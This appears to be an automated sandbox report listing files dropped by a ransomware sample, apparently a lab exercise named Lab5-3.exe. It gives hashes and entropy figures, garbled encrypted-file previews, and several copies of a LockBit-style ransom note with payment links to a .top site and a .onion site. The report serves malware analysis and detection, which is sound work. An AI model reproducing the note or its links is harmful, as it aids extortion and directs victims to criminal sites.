                                                                                                          Preview:sX&.. ...;..K.'...*w.X)..1..7OYlc.....wch..j_zp.......i...(..)..g.t?E0\]........N...5P.G...%.....|\Q..~..7yb..F..r.B..G..+s..f......Aq.d.....[i......p......&*...+u.QD..$..Y.F(.B.R....c'...,P.L&}..z.a...{...+}.._....^.....5F.`....1.ZV.;.....8N. ..x=8...>.^"./...0.H..O..d..],.5.HjFE>R].}.|("...?...x.p.9..CH...Q.N....Q.Q....)~.Jt...q{...VbDH....B..i XMj......i.,8N..zm....P.......TA.<l-..IP....M`..&...^.8.o/.@...#....~~.!.3..h.......2=...EO.D...."..g....&X......t_J:@..L......,j=...#... .KeR....z?..f)<RuJQ[.w.EeRH..3.....&.H...M+.....y.Bj!.*j. .)....M:.W[.W.G...G...FS^...)t...9q.R.<..E.O!.G..{..'.y.....%...q..R.k...P%ir./q..........0j.;.I.+$..JR.x....55..#,....Ap.+..m}d...e.....b%^4@.o...../....I......9]&r..z1...;.G.k.....Y..~..B..75..T6<7.;{.}..B.\dd.....(^.o...WV.:..../&.uj(...|j1..!...2...c....].Z..X._....h..;.yH..k..j..G2.&...Ai....o3.....U...Pn..IE..?.W/.R1.Z..5u..tOd#>...E|..cQ...Q.B...hR....{^....<.S.7.....X......Y&.v......q.../
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):123856
                                                                                                          Entropy (8bit):7.9983262645986555
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:4ngnCMhg97G7mvzNzGizujiJ9Rwm0BnJ+2gM+gxonIr57WJtUu3lyPpq6deV+5/m:4SFhg88G2LYJ+2gz4t7WfUuAxdkk+Z
                                                                                                          MD5:36E69F18182DEAAB577BE74A3A0B5BEA
                                                                                                          SHA1:61390F0AEA68E82FD731F2C9D731B9E42AD20D9D
                                                                                                          SHA-256:98B46A69D54371CC94E191287E9DFBB3EA486421386358A5606D85D3773E7516
                                                                                                          SHA-512:77299EDEF9C6558F580D83279E444428B326BD3AC5B6205759E6E184797C6618498668ACA7E815A1518B7704B7A374A34362407F8D5FAA6691DE9D4EAC345901
                                                                                                          Malicious:true
                                                                                                          Preview:!H......J....F...~.B3....].b..!S.7n... //.*.f@ .g.|A.K....%.q..y;f.>.2....A..;.....=.M..#.%I9-.:..;...u.rh.j.h*Q.Y.W.H..gTa.5....m......C.....I.5?.........e....g..^..K..WY...N^..1..w.+5L?...8.T..J..^...z.1i.g..|C............)..7Ro...C..A..:....<.zU.({...W.k|....SYU.3W..jrQ+*Q- .E.9..`.......~.&.#..%.......D.|.dD..i{j.P..K..-.....z..Jj..S.....[.hL.;.j7.fK...8.D.L.....a.... ..jMD..(y.@.H.,\..Jz....R...r.(..f.N..H..k/W..9....Y...U.n.E.(....n ..Bl.D}..c../..k2`.{5.Y..W....!..y.S....$k..WB]/.{...j......a.e...c.j]q..c...$[./..X.@..ggx...:..H...........2.P...F,...a.....2..nf/N.`..pD.....O..7f._.2.f.[':..Qf.......>..~.,.....v.."...nC&Y..06.......mFV_l..{..cE..8..._.....S...k..J.`|...n.`>t.iQY@u.....j..d;...p.Q..c...y.M.....`.kq!..%.*3i{..m..P.$>...F.XV.T.Q.!....v....6*..&.gE../....xu..@..G,0.Z.......J..$..SfkXh,82....3j..>....b...8.....].........AQE..5.|.v.8,..B.dv*W..[..g4....Jz..)...z.SK.9i..."_..B..S..+...`..T..%.?..w. -..7H.aE$.....w0. ....S.u...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):80000
                                                                                                          Entropy (8bit):7.997492207372948
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:4WrGTAXHGsZAEqK5FWakWGislL5ES/cvyzcWxd/zyZG9FWeAebDVZ:4AG0Ws6VUNs9ZrmgFb1bDVZ
                                                                                                          MD5:B6D38C5D0FF6221F7B2CEECCDCFF3004
                                                                                                          SHA1:1990C0C612125C01A6C94F547B31F4C8A6053E34
                                                                                                          SHA-256:85D2167ECB34DBD03E581A4BC8556F3EDB6A3CF1F664B1A766F66FFC90825740
                                                                                                          SHA-512:766E1634D67A4F1006C961ED8812594E6EFA0D62C1636A98AC3DF7EEAFF8F9FAF9E86F220384C2323846FB0C8DC8005E9988642EDC56D9F4A6F0C20C1E436649
                                                                                                          Malicious:true
                                                                                                          Preview:..`...x.#.Yt....t.*...k.""B..}D69.....z.o..=U....z\....H[.k#...'r......:F.e.....zn....$.L:...=-u.X..^.......+.*[n....W.GJ.eS.......!...M...[..t...>...fI!.oN=.&.....~........}...A..P..r.t>.Wm"...Y.H.CQ..8.]-.5..DD..#.7.`..Y^8.%)we.Y..._..+$Z..%.8...b.).*.2L..CYW.}SP..0..]&zdx,...U)....8......E...@......."....^...a. .8hu......^."....._..[.*t.1L...f..)^./...]5..L(...'&..e%.....(,:.......7.N.X...Z.W....!...YYZ.W.M....%d>..._}q.].....f..i.!K........W...M.....q1.>.a..........B..&U'.p.\K....1EK...M@.A./......vv.x..2D..*.+..8$;.9.DP.oq.^...2s]..G.].....{-..p.Q|....0..".1`...h....F........f.G.U9]....3.Q+ut.=......6....]U...}-.J....D..*#6.l0.d..E.....-..H.B.@.k..3s8..g.+..R..<.*.E4..U9(.Mn....oD.."}.Ml.b.R.G^.y..P.@..s%.b.F..,+O.\.'.....w.o...F;..P...F...-....w?.'Y..]..N...F..0.$..h.6`q.XW&..Q...-6hF....L.......o.3....{a..B....8G..P..p..=.,XN.._[y6fJK....~..l..!...T}.+%v@. ...h..o.|.U.1..J.......o x..L..._..Z...kG.C.....z~[.=...2`>.Z...JK.M.|.+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):80128
                                                                                                          Entropy (8bit):7.9979000490189085
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:KYEownwOBNR1ehqYT3qkxTDkVQpsoirDSp8V+BBLkENuCI+PBd9UL36cAeWcJFZ:yownwGJehqq3NDPf0+BBbNuqd98npFZ
                                                                                                          MD5:1180C181BFD88730DEC909C7503D5E9E
                                                                                                          SHA1:8459F47320479F4FD58FD3D8134D62DDA1B177F6
                                                                                                          SHA-256:B4AD07DE45625A54E313FF681158F27D2A0B12B656B8AE648E94FC973522AB7F
                                                                                                          SHA-512:79FC6F8C38B8106E68FD73D15560CF062179BD8A20DB3D1E3904F9F8E5B4BD0B8498DA2EBACAA908FA49D816141192DFE89189A27E2A578078CA010D4D6CE036
                                                                                                          Malicious:true
                                                                                                          Preview:s..CF.U.....Mw~.^.,......!..@.J.2?..6..>.$-..QkO&#.?.9.y...7.%.).9..B.e...........Y....im8r.J...S.....`.....u._0.WK.1/.'c.b.x..+.K.].....W..>W.....T.`.Xi..$..fN.N.!(..._....4X.3.F.)...h..}...w_....IvC.s.....vD..C..>.Y,.E..i..5.]@..A...2X'.....c.%.A....ap.[.L)F.K.r.m...2.[(OIA...."....E."Oq.+.nU..@.s..r.0...G.M.r.YDVjl.ogl..6.FC.J..$}].}9{..6.Fb...1o....z6..,.h...q...`....,.w!f2.O#...;MrR]...=......$c...`.$.V...`%....(...\+`.A....|"09.....D....i.1t..kQ..;\%f,.i.ZH.).b@g.^...U..y.TP....I'.g.V....i..-<..N..:.\...A.".-Z...;v.../..W.Co.}.k.3j.."..tf.iw..m.Cv.Z"...jz*H.KbdQ.}...Z*.D.`.H)....:..^.......if... .ba2nqL......v......aM.`.*.]^[..G....1x.c....{z..i.....1....v;..E8p@...e..C].|.m7..F..g.....Tj.~pr.'...<!......a.j..C..|0.{N1..'4.hD..7 .... ..08'4n...[w.a...v-..WP%u.~..........H/0.....$..KWG7..X...o..3.]Y....6h:p...JnE....1..C.k...o.."..8.+wy|+...Ww.. ."...:M..3...R.....................}......>...y.........0.ml.AK$6...dqN+.Tm1.."}.k.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66752
                                                                                                          Entropy (8bit):7.997295764662044
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:wV2IvhBHyclCH1k77n+IoxpXACcdrJjt90XtsSXABwZ:+PvhRZgu+IuKJjQXtsSXVZ
                                                                                                          MD5:09BA5BEA48427E2418B1C1DA13DD2A5A
                                                                                                          SHA1:0ED12F6BC1B08B848E3108CEFF5C8100F1170C22
                                                                                                          SHA-256:E5D0B8082B396E55A117728D0A40B84E5F130272E48C19BD59C4FF1536D314F1
                                                                                                          SHA-512:00145E1E4AE1F15EA87BF4BDBCFB923F38ED3B761515327C5592DDBE7BCAA3F511C91EF885FC4FDFE8D6A3E19F13A0B0102844FDD01D374C99877F131A73F233
                                                                                                          Malicious:true
                                                                                                          Preview:.l...J`.R[.y.T.Vz.*).\.M..*.3.p.5...W.<Zf..h.Z8.7.f.......C...rcpI.R..Z.V.=.HJ..z..e.s....i.G .8O?..H.$...S...]......(L..Y...Yg.......N{.l0`.....p.>w.-.4E.....H....[..9. ..r7..".LkH.n.ap./..9o...L..3E._..^*...h..o.*.]......N(1..z.5..'.9.u.B&.....m.....p.....K...X.a..q.j..DU.....z..{WuF..^.8^..aA..n.TW.G.a...)..X.. y.PP...8Y....*..k7o6.!...q...=.J.......7......'1..e...ZXJw.eOK.v"G...\.8./"..s8.5.%...}.....@........Vc?..?-...D./.Z-.P.d.j....yz.I...yL...=E.?h.#....R;MFx..,.=.D.~..#J.-(>#._.3..:.=... .%......\Z.._...,.Us{HU.8.[.i...-2..^...v@ON.._.].S/...hv....SXZF.......O.'../..j-.W....s..3'.C....7<5. Nz.)..H......:.s...P.~...iLjr.F..e^;...|.S..E.N(g.Tv...,aI`.....2..$.@.8..a.y.c]....t{.....L%......6F..|].+...Di.RA.d..E...T..a....l....z...#.....mkj...E.....|.l.Q. ..~!&d.Eh....v......v2..........fY.0..`..2....!....l.f7./.j ..A.-=p.i...L.....D..a......<..w,g.R~......_.,p.<...o~.h....W.C.P.C.....L.......k..k..@1..6.o.<mG.1.bg..]....I.5jt,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):67904
                                                                                                          Entropy (8bit):7.997524928528745
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:lMIRARvVtAgtec7JNww2ZVf8CViKqD/Xjse71JrGbyIexnLisZ:l1RULttecdNP2ZV0C7ifjf1QbyMsZ
                                                                                                          MD5:AE5B45920BBF928C3FBECA47EB433437
                                                                                                          SHA1:7D9C7B77249F306B2442AF3E952B48A9E7B07E4B
                                                                                                          SHA-256:C3DC720FDEED190440262DE9341041F61F2412456A23559D5C1B9191793B6439
                                                                                                          SHA-512:31F9C3EB6CDAD7916C0C76788323CF98D6C31C683CD188F3F0CCB430F524B7D2814D3D94AAE94DEB7FC101E98947FD9216D709BA62829CD7D35CD11CF8BED734
                                                                                                          Malicious:true
                                                                                                          Preview:]=.H.Jy...4h..-.9'...H..%P.'{..}.UG..{.C.$.l.S...k.....J.....h.(\n.q$6..._.3=....^I.4.F.V2..M.Q..P@^3...x....).y...9.x t..>.....J..........N........(L...V.....K.GH..*.Z...|}~ILPR~.ky>}e=w2.(W4...r\.l.F.TX....._.-...9A.......1|7.2].....Rbb.&./y*9..[.....F...j.$...."C.7....^..e....x....:F._x.14...].....j..g'..j.."O.9.....,y0........U..`O.#......]^......S...&'..>h.aRGI"...$t5..^..h...V....^...N.......3;..{. d.0]....X.I...<....h.....x.`.._H:..~....a.:Z....9...s.'..n..;.Ny.....N...2..>..J,...^.!....p.I...="i..gG...&c.t....2..IazG..l../....oD..o....Z.".D.UC&..p.j_.?....|..dh=]..w..X...Q...ES.DC .MTKU......j....<>..n..'MNk....;Ds..c.bx"_....'O0..#.....@m^p..0r.V.W0...4.-.7,..._.r.-.G.."h+R.i....U.z8.@...pr..*.fQ....um..i_...F..h.8w,.b\d?...k.&eF...q.2..*.V..p~..~.L..M.l...U.%.n_.1..%.......!...U..=.Q.....F......6.:.-...{a.BN.....?c..<:[.n".Pg%Mm&.....s.C2..MF.....$....P.....o..H.Dp0....h..m%..R..s.J..n.....X....P+..0.}..{N.......ZM..>.ur.w.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32160
                                                                                                          Entropy (8bit):7.993739618281219
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:RElPGlyjfqipIdD1XP2ICrU1yVvFsBZI5jzcZ:kfqipYXOICrU1yVdsU5EZ
                                                                                                          MD5:952EF2310DB0E10EAF74456523470686
                                                                                                          SHA1:C4CE90F77B6DAAC949C4A49F3CD0FC3A130B654B
                                                                                                          SHA-256:B1B1F6D3EEF3FFBEBF474A7DB2CBCB678ADFE9D49945939E72EFC8ABC69410E7
                                                                                                          SHA-512:33F1EF2D16DF979AE1B19F20CC18DDEBD893328F3D1FBF9DA9FC3C4CBDDD199B49F8D47CAD26A535E8F23EDD8C7C379E0632F42635E583C642E1B64014055028
                                                                                                          Malicious:true
                                                                                                          Preview:..27.....$.l.....J...!..:..g......E.?/...:..%m.AD`C...!....Y...8E.._.=..9-'..Q{...4..{.....p.....m..EFuG.&...%.oL.9;........'/A.......@.%..c...E2.J....u.:.<=..:.@...(...5....u... h&..={a.<].q...........<.....*.&..IR.).M./.G.:..9....%3......{...*...EX......a..v.nE\....y...l...G.Y......{o[..0f3h?.....H.^.p=.`.D..O.;:........g....}.07.jI(......*.H..9.u..".....lyP.g...c..d..$._....3.u..m....p/Am.D.~EA&.a.%....M....h..T...G.ob.eY.G.V*A......'....]..>..9.q..u.UNvBl.w..i....HG..g.o3.X...B...[.r.I...P.(.VFj......(?[.......r..z.75.]6...i.2#...E...%...l.J..L..YY,.(!0..9..U.C.........xY...G(.c@K....Z.<.OmU......)5.Y.D.W....C/Z..Z7....O.eJE.,..$..7io.K.`...W.T.=.F..,.j..4.X....T.?....i.x~`#.......Q|P.Y...p......T........V..0.2_Q.4k...9....d...7w8..~..Wi...)..(....l.....W.9.Py..z%y....,A..H.*tf..zL..b.........K_...Q&..,...s...~<E.../#B7..._.v.........R.4@.Ct.nid~.I.$. .}.......#.Sc.....M...o.9.b.`.F.(.$.NA.O.ro.z..XW....S.Q1.M2....u.....u..c@zP.(@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4288
                                                                                                          Entropy (8bit):7.956799465378678
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:9WsQh9egNvHgsweE2QFGg+xihXyVoiGx0uKeY2ElUJ:9WsQh9egJ5pQP+ue80Cb
                                                                                                          MD5:B06F0BAE919A94A87C9B146A6BFF1F15
                                                                                                          SHA1:11F14E803EBD8A3B9B0D195F812D6A5004C26043
                                                                                                          SHA-256:84EE4E4F3104FC12EBE9055A09F92E95DC96E9A0E476E513E200CE980A27114C
                                                                                                          SHA-512:4CFAAA505B466A598B00BA934713D2204B57955C2E3C3554820650D02F4779D934DAD9AC6AFA30E46E7E0D2A8A601094D8804278724D297B1ACD0BBDD2F2F61F
                                                                                                          Malicious:false
                                                                                                          Preview:.)ZII..Z~.&P.*.&.ol.r_.k.hW..:..Yqde..G.Qdk..{I...fO..+.../..z.*...O.%...o.....-....Q.Q......k.`(>&*....C.eYCK..}BU.9.:@.R\.9...eTe...j4@......t;ud.`...(.....D.W.H...._5.v[..$.....a.6..5.....M....R...G.'..7\.uG.|.\P...~..?.`.6..m?..MK.....A.I...1...."....:<k1G&.K_r.Y.3u.7.T.M".sgZ...sl..O.I...?.U..z>....3B.U...|i]..z..6...(}.z.].#i\.......|...>...V.9.U.....o.8.e...t.OG*J.Nin(yu....f..h@.x.v3 p.%l..d...*..?....H..3....g.s.......T.>........>.-..|...k...~......(i..02...x7..9....................N.@!.[ ......E.....B_....L.....K.u......(.F..].w)..W..`.?.T. ..:.3..f...J...r.cRY....GyD..y...W.l...~..fDe.$.Bv..... c..4m.Us<..y...........fr...~z..x......rl..G.B.2..:..]s.".G.3S.Fbg...J.,. ...$=.T0+..4;=....|...j.&.7$J.....x.E...'...*\R...(.0..yH.d.\%*.+r.87...M...Z..q}..>>......=..~[./.+&+....SaiP.S-d.V]<..'......_e...u.......d.O......w...;Q..t...JA.....Q.....x..*^..p..<Y...".b........\..+8BE.[.3%.d.N......Z\].....?.|#...~.d..F.......Q^.%...I..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17968
                                                                                                          Entropy (8bit):7.988486239765676
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:KKIBvH4xkwqxQfAn7KSx85R+b0TJ+S/y1B5zAakZ75omrltb:KHY2wqV7KLi0QS/ALpG9JZ
                                                                                                          MD5:0BD90C9CADBA49A1071DCB44EF0A1FA9
                                                                                                          SHA1:0C527A10307F0CF8CC8F824B4BD4C33025016A77
                                                                                                          SHA-256:9D09B63DD87E538C687D38C51BFE6F8BA740C6D3661FCDB17E551D1409F3A110
                                                                                                          SHA-512:2605DD4EBAC30CDA197C12C5942BEA2749D639A29A812F05868C230CAC9C1C94709241F829A1947B20041FD09D94578AA7E3E4C201FE58157B8BBDAEE1071E89
                                                                                                          Malicious:false
                                                                                                          Preview:@.Y!....N.>.%-V...{.8.Z....U.s..v(.t..>....o......F.....4..k.".5._$.S..m.a..PJ.LM....g2.g...(u...'W...7xbM.......d.;.z.)w..cH.q...EL-`8..}_..U..vg...Ob.49...N.....l..(.X&....A..k.....&......9W.....)..6....CO.,n.]1!...$ rOw./.<.86?WP....E-QT=...4o.!,....`..+r<I...s.G...9.M,.`0..!_.z.......W.......W~.........aB..c.b...o..e....M.V.<D.i....e......9y.VG,.0#.A...h....d.XH..n......1....v`..Kr.t. ...]b..Ew8*...`7..o..I.9..Y?..I.P.S9....[.k...C.....,e.e...|....P.......uHL..., kR.!..~....b-....$.?H...0.,6:.....k..J.@L...!hG+.pR...$......Iw.^.i.\;.$..X.L..M(p.<v......].y(Y.i.Y9{....k...e...].i...J...V...q.......)....e.xK.o).l!.{*...j.I.xT...>......8?.8.%C.2<...D...n...+...<.o(X.....6U*.^,..K.k..0qD..i..2...k..R...6..._`.W.$.3=...(H.....C%.4)v.z.3.....?.....Q.D;.Z....).....vq.1s. .3.r..t.@...N..Q\y.i..!.Z..WcG.7.....e;..;5i..k....p...f.4.|.V~lVP...4.....N].F...V.[..h.&)}E+....#.IH:.0..]UQ.N.A...\.:..Xf$}.....G....z.F.|WI....s.. T.jM".
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7440
                                                                                                          Entropy (8bit):7.975573001216678
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:fYONuN+k1RXJhVTDS5XM6J/R9xFVya1T0Cb:fGfRXHNDSNXJ/zTVb1Ttb
                                                                                                          MD5:E63C725733B915E13A48FBD659CA6E04
                                                                                                          SHA1:2FF518C7838E9F791D0BE22E95E8EDEA386E272A
                                                                                                          SHA-256:00CD7DC702AC8ECFC8BA66F4EBD808F1489D556E6600F714EDD91D844A986EED
                                                                                                          SHA-512:13909FAC3AD1392270EA43F30D1B186F2EC2C667CE2EF98F4F43660895E3AFE24495635B0E03C579C2DD1926905D18E7713207F5A1A54364E54171D8C9C4F63B
                                                                                                          Malicious:false
                                                                                                          Preview:......x.x....*......].ld...Pt......#/..c0..LADi...S._...k....f..v..i..p.s..sl....?..}..n.......&..=.....1_......s......I'.$.V.:....U8..:31..f...RR..!...z..4..|......n..&N.Eb..8&...o..w.V..Y._...X..Y...\.]^7wD..O+.#.<.q&hb.....TC....ZZ....eh.....@r...c.=..#..0.....RS......Wt...X\.p.^.u3..7PX.@f...o..Bb.x..1..n...).......;.......W..1.j......KF...\..LE.8....LC.-.oR..J.*.P.$s..u.W..#U.^.(/..J...6x.jV.wx.@b..<..9....2@.J*p..1......~.&..\Rta.N..=..-1.w......Z...C....r=n....*!.D3+^..*'wh.%0.p..U...V....}...FK.WK/9..M.%QX.fDo.....W.$...6PVa....F...g..;K.5.t.f..n.{.-..h}.o..`..].&4.*.....u.E.W._f.|...X...e..{.....K.z......U...~P.*..|.k...D..>..8="./..o.#.uU.<.pO.....V..c.a.*$.4.l...u.....G;.M.-...l.CM...g.T".r..........Q.._5.^@.&uS..7.ZwY..b........'..^.....:'.....gpm.HU..U..8T.5.8...=.. ..X.5;......H.Y-..ET.;..J....#i..Rc.:gt...g.....m]........R...?.Z...>.b...h."....x.B......8;j......i).M.v4.nglI..`,.T...GS.......G......g.4I|.;;.L.Z0.....wy. .T.s.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10176
                                                                                                          Entropy (8bit):7.9823749926747345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:NsJ+NzJCuvoMJqVtqthkppHnyWtbKMGNjXAL0LBRJ/QgjgzitocE+lX0Cb:GJ+XC7+7ESWoNrTBH9gzchlXtb
                                                                                                          MD5:9F9F477EBC3CE2BD5CCE1B3E207D5C28
                                                                                                          SHA1:66E6184112E722C36C1E9B6971290263B7A4877F
                                                                                                          SHA-256:5F597BAB2DACF784BC37844F432748BFC8F296D6B340F386A5BA82A6DFF55E44
                                                                                                          SHA-512:A4575293CEDD6D201B558322047699FC59778A0E24D1475E52E0B95282B2E6A6B42894AE1C4186CDFA42EA72BDBCE16492D4B270A2BAFA573365BBEC4FE93B62
                                                                                                          Malicious:false
